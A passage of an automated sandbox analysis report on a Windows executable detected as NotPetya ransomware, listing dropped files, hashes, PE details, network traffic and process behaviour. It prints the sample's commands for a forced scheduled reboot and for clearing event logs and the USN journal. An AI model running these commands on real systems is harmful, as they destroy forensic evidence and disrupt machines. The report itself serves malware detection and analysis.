                                              SHA-512:4C781807304B721DA894B1125EA9BAD78E81EEE4AF61987CBB6266C9EE9B3DE851FA578BA86DA68E51998E945DF48FEA503F7966F2685D1A0FC6505EF4E894A7
                                              Malicious:true
                                              Preview:..*~...<....g).uf....Y.....5...V...U.\....e...3.UA..i....=.#..F~%m".."...v......U.....v.~w&62..i.;~.Z....]4..(.L2..VWWS.f...F.g.!JQ..a....N..l.}y..}.^B..7oC.z.....}s1a.3...SN..3"~i...h......[&.~....i..#ej`..r.x="d.)..2.!..@..U..TG..B.~..../s.bAN......c..2..........K..t....Z..o._.E.;*...n..:4.....zei._O_-U.6....|......z*^._...?az...H...r~7Q.X.EesV..z.l.....s.N....Q....[.L...V.5....|9U..2.+..G..Q.{...2oC.xtFF.X..x"..8..`.P.J.....'..x..$.....u..e~B..g6...e.g..".2.k..*.4-.l...~..,.....>.[....:.64Z....0.....n.>..\.|.Q.S..&....%.6.....<.[..U....*..0....s..."....[RA.9....N..0.."...4.kC...}.*.......H.U.L....B.8.SmQq........A..!.`.`2.WO.)....P...M.|.X..6...<..M.7|.d..i1g.^..&.X..nI....D.....@O.....!*.8....s....K.....80..V.).Y.+..Y..N.......U..V..k+.Xm.`...>H^.w...]e.).QR.op...dd....3c.a.%.k_r ...........(."7hcV.W#...|..ay..K....s...Z..}...]...8.....\d..;~......c.]..p+..d.........*g.l!a...O...^...I..u.F...(.@..w.i>r..F2.H>.. ......Y..@

                                              C:\Program Files\Mozilla Firefox\updater.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):414640
                                              Entropy (8bit):7.999501787527219
                                              Encrypted:true
                                              SSDEEP:12288:z85t9lmq4Y42fc1b3ckR/ilYePeps6q0c:z8Sqj422Lc4i+eK9c
                                              MD5:C69EF7A534A9395D0DAB134297BFBD2B
                                              SHA1:CBA4F36DB8DF0B93887F67DE49CA61E030980A39
                                              SHA-256:3D420B5E4D5D5F11B43225BC922E5EB01C8F4A702641298947CC20B23E6195E3
                                              SHA-512:0A5DD13439766078E709986441B8E42A18B60498A1730AB320776FC588BD5B397EF70894F8B495714A2231381342D0DDE0DD2F042AE2DEEDCC59EDDEA734C09E
                                              Malicious:true
                                              Preview:..0>.sP:.y..(us.. ...C....r...V....mgl.{..c.QiC-..l.ED...`.....A.'3=..+7P.QL..MO.e...c...6..$...8.K`..&..(q.........w..r=.v.k....Y..k.._..g..`C~B..L....T.w.tG..j'....JunD|.x.J. ....zQ....|s..z`....I...........HJ.?...#T.-.....KVorX.aB.../H.....~n....[.B..h.u(....TWm....6o.Aw.c.j56.g.d...JO.....S..>.b.+.M,...k.w..\;...Y.ChI.P.z-@E..%...r....l..f...H.....|.o..2|w..X..,....x.D]..N..}uR.M)....b.P..,.y..,..C.E...Q;.....#.J.!H.H..%.r..@.k....W.~`....v.f......x?.@.....$.......O3..@..0e@.#...5.8....4.....7^.5w..Kg&..[bi..3<T..pX....jP.N...N.a.w\..b.'..m..N-.[e..2R....8..b..0Q........cD.:>R..z.`../..HV.\..T......I.tL..i....\T..{......1k.;...Bo.....6......S8.b...;b....R.Buf-q-...V..<.T.c.h".,.Tt.Nz.0].2...,l..i...... .^........3.V!.~/[..u.+.....>.Ro...._.cX....x.#...0..I...Ng..r?.B..|......M)<E..Y...f..lbcQg..MGd.#...C.+N$.l..|.).NQ...0.'.F0...."..=.. ..5..)..+........e..)S8.).?._...Q.$....X.a..w.........3.L.J.n6..R..N...>.0.pz..q.82.$...^....A

                                              C:\Users\user\AppData\Local\Temp\F2CD.tmp

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):56320
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BFD70118226E2E6391B6A0992F8B5B22
                                              SHA1:4F9E3810D346B368B7C2437EB4BB040D3F6DAED3
                                              SHA-256:F8D214080544676394EEA8DDA1CBD79DB436414860E1809CCCD56B2DA039C724
                                              SHA-512:AB771F24EBDB0C3FFD195AC67B8F655F8EE7037C983AD05CFAC6660BCC5FDDD40E053C859F85990B32227D69E080E2559127A6D9CBF686DC55F0796C7A3F70E9
                                              Malicious:false
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Windows\dllcm.dat

                                              Download File
                                              Process:C:\Users\user\Desktop\p2pWin.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):362360
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:9A7FFE65E0912F9379BA6E8E0B079FDE
                                              SHA1:532BEA84179E2336CAED26E31805CEAA7EEC53DD
                                              SHA-256:4B336C3CC9B6C691FE581077E3DD9EA7DF3BF48F79E35B05CF87E079EC8E0651
                                              SHA-512:E8EBF30488B9475529D3345A00C002FE44336718AF8BC99879018982BBC1172FC77F9FEE12C541BAB9665690092709EF5F847B40201782732C717C331BB77C31
                                              Malicious:true
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Windows\dllhost.dat

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):381816
                                              Entropy (8bit):6.566133361341289
                                              Encrypted:false
                                              SSDEEP:6144:xytTHoerLyksdxFPSWaNJaS1I1f4ogQs/LT7Z2Swc0IZCYA+l82:x6TH9F8bPSHDogQsTJJJK+l82
                                              MD5:AEEE996FD3484F28E5CD85FE26B6BDCD
                                              SHA1:CD23B7C9E0EDEF184930BC8E0CA2264F0608BCB3
                                              SHA-256:F8DBABDFA03068130C277CE49C60E35C029FF29D9E3C74C362521F3FB02670D5
                                              SHA-512:E7C0B64CA5933C301F46DC3B3FD095BCC48011D8741896571BF93AF909F54A6B21096D5F66B4900020DCAECE6AB9B0E1D1C65791B8B5943D2E4D5BAB28340E6F
                                              Malicious:false
                                              Yara Hits:
                                              • Rule: JoeSecurity_PsExec, Description: Yara detected PsExec sysinternal tool, Source: C:\Windows\dllhost.dat, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 2%
                                              Joe Sandbox View:
                                              • Filename: 027.dll, Detection: malicious, Browse
                                              • Filename: QYXZGHJc38.dll, Detection: malicious, Browse
                                              • Filename: NotPetya.exe, Detection: malicious, Browse
                                              • Filename: NotPetya DLL.dll.dll, Detection: malicious, Browse
                                              • Filename: Trojan.Ransom.exe, Detection: malicious, Browse
                                              • Filename: qFTst626iV.dll, Detection: malicious, Browse
                                              • Filename: NotPetya.dll, Detection: malicious, Browse
                                              • Filename: notpetya.dll, Detection: malicious, Browse
                                              • Filename: 6r3kQ7Ddkk.dll, Detection: malicious, Browse
                                              • Filename: Xu0Yl0gJER.dll, Detection: malicious, Browse
                                              • Filename: 5qoV7TRt2Y.dll, Detection: malicious, Browse
                                              • Filename: tvHP8AUd45.dll, Detection: malicious, Browse
                                              • Filename: PbrBnW71uv.dll, Detection: malicious, Browse
                                              • Filename: rTcWdtStAN.dll, Detection: malicious, Browse
                                              • Filename: NotPetya.dll, Detection: malicious, Browse
                                              • Filename: 02XuXOatFM.dll, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..x...x...x...q.8.R...q.).h...q./.k...x......q.?...q.(.y...q.-.y...Richx...........................PE..L......K.................H...p......U........`....@.........................................................................D...........................x...........`c..................................@............`...............................text...zG.......H.................. ..`.rdata......`.......L..............@..@.data............ ..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                              \Device\Harddisk0\DR0

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):5120
                                              Entropy (8bit):0.018426846734561325
                                              Encrypted:false
                                              SSDEEP:3:Ht:N
                                              MD5:F57ED402C9376C48554614180322BAAE
                                              SHA1:AFE4A94BF88758BCE4ACCC6555429EC25F1840D2
                                              SHA-256:A3826A297EEC4463D8472C1A4B7503765BD12C33B69031F014838FA9E6342D23
                                              SHA-512:CC0C5556E57C35D4D09FED4D8B4032047722B0485FA6E81F2585087E6C21E2E58E065543E4EA81138FEF764858BBE53B798CE792EF79525755E96CEFCECC09BF
                                              Malicious:true
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.678630793238872
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:p2pWin.exe
                                              File size:399'360 bytes
                                              MD5:8c64181ff0dc12c87e443aae94bf6650
                                              SHA1:e91d7ebd17912785caa3e71ef1571dc01b1cd854
                                              SHA256:4c0153b979e65346c1d6f863086082ec5ef103cbf6b0f5e8652d61da678a8ca5
                                              SHA512:4854565b054297dffc13b659a53059ee8731dca02f3027501254551cb4af20b68fb121d03e528151cf910238b49bf00a3827e74e4bb68faf85ebc50d02ad5c17
                                              SSDEEP:12288:ef/X4NTn/xVkNG+w+9OqFoK323qdQYKU3:EXATn/xVkNg+95vdQa
                                              TLSH:BA84026131D38171F0F38A3419DAF7674FBEB4524770918ECB5A561A2D31781AB383A7
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S..YS..YS..Y<.FYY..Y<.sY[..Y<.GYk..YZ.~YV..YS..Y...Y<.BYR..Y<.wYR..Y<.pYR..YRichS..Y................PE..L.....?\...........

                                              File Icon

                                              Icon Hash:2775250905472797

                                              Static PE Info

                                              General

                                              Entrypoint:0x40128b
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x5C3F96B7 [Wed Jan 16 20:40:23 2019 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:ab8fd60b3da01515e6706e8d122c633f

                                              Entrypoint Preview

                                              Instruction
                                              call 00007F07C0692784h
                                              jmp 00007F07C069112Eh
                                              mov edi, edi
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 00000328h
                                              mov dword ptr [00461C38h], eax
                                              mov dword ptr [00461C34h], ecx
                                              mov dword ptr [00461C30h], edx
                                              mov dword ptr [00461C2Ch], ebx
                                              mov dword ptr [00461C28h], esi
                                              mov dword ptr [00461C24h], edi
                                              mov word ptr [00461C50h], ss
                                              mov word ptr [00461C44h], cs
                                              mov word ptr [00461C20h], ds
                                              mov word ptr [00461C1Ch], es
                                              mov word ptr [00461C18h], fs
                                              mov word ptr [00461C14h], gs
                                              pushfd
                                              pop dword ptr [00461C48h]
                                              mov eax, dword ptr [ebp+00h]
                                              mov dword ptr [00461C3Ch], eax
                                              mov eax, dword ptr [ebp+04h]
                                              mov dword ptr [00461C40h], eax
                                              lea eax, dword ptr [ebp+08h]
                                              mov dword ptr [00461C4Ch], eax
                                              mov eax, dword ptr [ebp-00000320h]
                                              mov dword ptr [00461B88h], 00010001h
                                              mov eax, dword ptr [00461C40h]
                                              mov dword ptr [00461B3Ch], eax
                                              mov dword ptr [00461B30h], C0000409h
                                              mov dword ptr [00461B34h], 00000001h
                                              mov eax, dword ptr [00461004h]
                                              mov dword ptr [ebp-00000328h], eax
                                              mov eax, dword ptr [00461008h]
                                              mov dword ptr [ebp-00000324h], eax
                                              call dword ptr [00000044h]

                                              Rich Headers

                                              Programming Language:
                                              • [C++] VS2010 build 30319
                                              • [ASM] VS2010 build 30319
                                              • [ C ] VS2010 build 30319
                                              • [IMP] VS2008 SP1 build 30729
                                              • [RES] VS2010 build 30319
                                              • [LNK] VS2010 build 30319

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6024c0x3c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xb0c.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000x5c4.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x61300x1c.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5fff00x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x60000xfc.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x44c20x4600False0.616796875data6.430171910742918IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x60000x5a8100x5aa00False0.8549757543103448data7.762488666147487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x610000x18c00xc00False0.21419270833333334Matlab v4 mat-file (little endian) \200, sparse, rows 3141592654, columns 11533746412.4878952701095853IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x630000xb0c0xc00False0.5110677083333334data5.423098345300529IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x640000xafe0xc00False0.4313151041666667data4.020063597668279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0x630e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.572202166064982
                                              RT_GROUP_ICON0x639900x14dataEnglishUnited States1.15
                                              RT_MANIFEST0x639a40x165ASCII text, with CRLF line terminatorsEnglishUnited States0.5434173669467787

                                              Imports

                                              DLLImport
                                              KERNEL32.dllGetFullPathNameA, CreateFileA, HeapAlloc, HeapFree, GetProcessHeap, ExpandEnvironmentStringsA, WriteFile, CloseHandle, HeapReAlloc, GetStringTypeW, GetCommandLineA, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetProcAddress, GetModuleHandleW, ExitProcess, DecodePointer, GetStdHandle, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LeaveCriticalSection, EnterCriticalSection, LoadLibraryW, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, Sleep, RtlUnwind, HeapSize, LCMapStringW, MultiByteToWideChar, IsProcessorFeaturePresent
                                              SHELL32.dllShellExecuteA

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 22, 2023 19:12:05.717529058 CET49675443192.168.2.4173.222.162.32
                                              Nov 22, 2023 19:12:10.196994066 CET49735445192.168.2.4173.222.162.32
                                              Nov 22, 2023 19:12:10.275855064 CET49738445192.168.2.4173.222.162.32
                                              Nov 22, 2023 19:12:10.447572947 CET4973980192.168.2.4192.168.2.1
                                              Nov 22, 2023 19:12:11.201790094 CET49735445192.168.2.4173.222.162.32
                                              Nov 22, 2023 19:12:11.264270067 CET49738445192.168.2.4173.222.162.32
                                              Nov 22, 2023 19:12:11.297750950 CET49742139192.168.2.4173.222.162.32
                                              Nov 22, 2023 19:12:11.436148882 CET4973980192.168.2.4192.168.2.1
                                              Nov 22, 2023 19:12:12.311743975 CET49742139192.168.2.4173.222.162.32
                                              Nov 22, 2023 19:12:13.201873064 CET49735445192.168.2.4173.222.162.32
                                              Nov 22, 2023 19:12:13.264337063 CET49738445192.168.2.4173.222.162.32
                                              Nov 22, 2023 19:12:13.451824903 CET4973980192.168.2.4192.168.2.1

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 22, 2023 19:12:13.477340937 CET52620274192.168.2.4192.168.2.1

                                              ICMP Packets

                                              TimestampSource IPDest IPChecksumCodeType
                                              Nov 22, 2023 19:12:10.447613955 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                                              Nov 22, 2023 19:12:11.436198950 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                                              Nov 22, 2023 19:12:13.451891899 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 22, 2023 19:12:05.026026964 CET1.1.1.1192.168.2.40x6940No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Nov 22, 2023 19:12:05.026026964 CET1.1.1.1192.168.2.40x6940No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:19:12:07
                                              Start date:22/11/2023
                                              Path:C:\Users\user\Desktop\p2pWin.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\p2pWin.exe
                                              Imagebase:0x30000
                                              File size:399'360 bytes
                                              MD5 hash:8C64181FF0DC12C87E443AAE94BF6650
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_NotPetya, Description: Yara detected NotPetya, Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: fe_cpe_ms17_010_ransomware, Description: probable petya ransomware using eternalblue, wmic, psexec, Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
                                              • Rule: doublepulsarxor_petya, Description: rule to hit on the xored doublepulsar shellcode, Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: patrick jones
                                              • Rule: doublepulsardllinjection_petya, Description: rule to hit on the xored doublepulsar dll injection shellcode, Source: 00000000.00000000.1627434367.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: patrick jones
                                              • Rule: JoeSecurity_NotPetya, Description: Yara detected NotPetya, Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: fe_cpe_ms17_010_ransomware, Description: probable petya ransomware using eternalblue, wmic, psexec, Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
                                              • Rule: doublepulsarxor_petya, Description: rule to hit on the xored doublepulsar shellcode, Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: patrick jones
                                              • Rule: doublepulsardllinjection_petya, Description: rule to hit on the xored doublepulsar dll injection shellcode, Source: 00000000.00000001.1627535297.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: patrick jones
                                              • Rule: JoeSecurity_NotPetya, Description: Yara detected NotPetya, Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: fe_cpe_ms17_010_ransomware, Description: probable petya ransomware using eternalblue, wmic, psexec, Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
                                              • Rule: doublepulsarxor_petya, Description: rule to hit on the xored doublepulsar shellcode, Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: patrick jones
                                              • Rule: doublepulsardllinjection_petya, Description: rule to hit on the xored doublepulsar dll injection shellcode, Source: 00000000.00000002.1631035398.0000000000036000.00000002.00000001.01000000.00000003.sdmp, Author: patrick jones
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:19:12:08
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\rundll32.exe" C:\Windows\dllcm.dat #1
                                              Imagebase:0x720000
                                              File size:61'440 bytes
                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_NotPetya, Description: Yara detected NotPetya, Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: fe_cpe_ms17_010_ransomware, Description: probable petya ransomware using eternalblue, wmic, psexec, Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
                                              • Rule: doublepulsarxor_petya, Description: rule to hit on the xored doublepulsar shellcode, Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, Author: patrick jones
                                              • Rule: doublepulsardllinjection_petya, Description: rule to hit on the xored doublepulsar dll injection shellcode, Source: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp, Author: patrick jones
                                              • Rule: JoeSecurity_NotPetya, Description: Yara detected NotPetya, Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: fe_cpe_ms17_010_ransomware, Description: probable petya ransomware using eternalblue, wmic, psexec, Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
                                              • Rule: doublepulsarxor_petya, Description: rule to hit on the xored doublepulsar shellcode, Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, Author: patrick jones
                                              • Rule: doublepulsardllinjection_petya, Description: rule to hit on the xored doublepulsar dll injection shellcode, Source: 00000001.00000002.1670184712.0000000002CCA000.00000004.00000020.00020000.00000000.sdmp, Author: patrick jones
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:2
                                              Start time:19:12:08
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:19:12:08
                                              Start date:22/11/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:19:12:08
                                              Start date:22/11/2023
                                              Path:C:\Users\user\AppData\Local\Temp\F2CD.tmp
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Local\Temp\F2CD.tmp" \\.\pipe\{0F3B598D-CFC9-40D0-87DB-B9CBE1DF730C}
                                              Imagebase:0x7ff72e900000
                                              File size:56'320 bytes
                                              MD5 hash:7E37AB34ECDCC3E77E24522DDFD4852D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:19:12:08
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 20:15
                                              Imagebase:0x180000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:19:12:08
                                              Start date:22/11/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
                                              Imagebase:0x240000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0xf70000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\wevtutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:wevtutil cl Setup
                                              Imagebase:0x2b0000
                                              File size:208'384 bytes
                                              MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\wevtutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:wevtutil cl System
                                              Imagebase:0x2b0000
                                              File size:208'384 bytes
                                              MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\wevtutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:wevtutil cl Security
                                              Imagebase:0x7ff7699e0000
                                              File size:208'384 bytes
                                              MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\wevtutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:wevtutil cl Application
                                              Imagebase:0x2b0000
                                              File size:208'384 bytes
                                              MD5 hash:3C0E48DA02447863279B0FE3CE7FE5E8
                                              Has elevated privileges:true
